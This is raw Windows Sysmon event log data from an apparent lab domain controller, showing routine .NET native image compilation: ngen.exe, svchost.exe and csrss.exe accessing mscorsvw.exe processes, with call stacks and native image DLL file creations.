13:25:47.134{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465B-6000-1C04-000000009A01}4964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:47.025{08A6967A-465A-6000-1B04-000000009A01}3452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d7c-0\PresentationBuildTasks.dll2021-01-14 13:25:47.025 10341000x80000000000000008275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.713{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465C-6000-2704-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.697{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-465C-6000-2704-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.697{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465C-6000-2704-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.634{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465C-6000-2604-000000009A01}592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.619{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-465C-6000-2604-000000009A01}592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.619{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465C-6000-2604-000000009A01}592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:48.556{08A6967A-465C-6000-2504-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b00-0\PresentationFramework-SystemXmlLinq.dll2021-01-14 13:25:48.556 10341000x80000000000000008268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465C-6000-2504-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.494{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465C-6000-2504-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.494{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465C-6000-2504-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465C-6000-2404-000000009A01}1392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.431{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465C-6000-2404-000000009A01}1392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.431{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465C-6000-2404-000000009A01}1392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:48.369{08A6967A-465C-6000-2304-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1244-0\PresentationFramework-SystemXml.dll2021-01-14 13:25:48.369 10341000x80000000000000008261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.291{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465C-6000-2304-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.275{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465C-6000-2304-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.275{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465C-6000-2304-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.228{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465C-6000-2204-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.213{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-465C-6000-2204-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.213{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465C-6000-2204-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:48.150{08A6967A-465B-6000-2104-000000009A01}4704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1260-0\PresentationFramework-SystemDrawing.dll2021-01-14 13:25:48.150 10341000x80000000000000008254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:48.009{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465B-6000-2104-000000009A01}4704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.853{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465D-6000-2D04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.838{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-465D-6000-2D04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 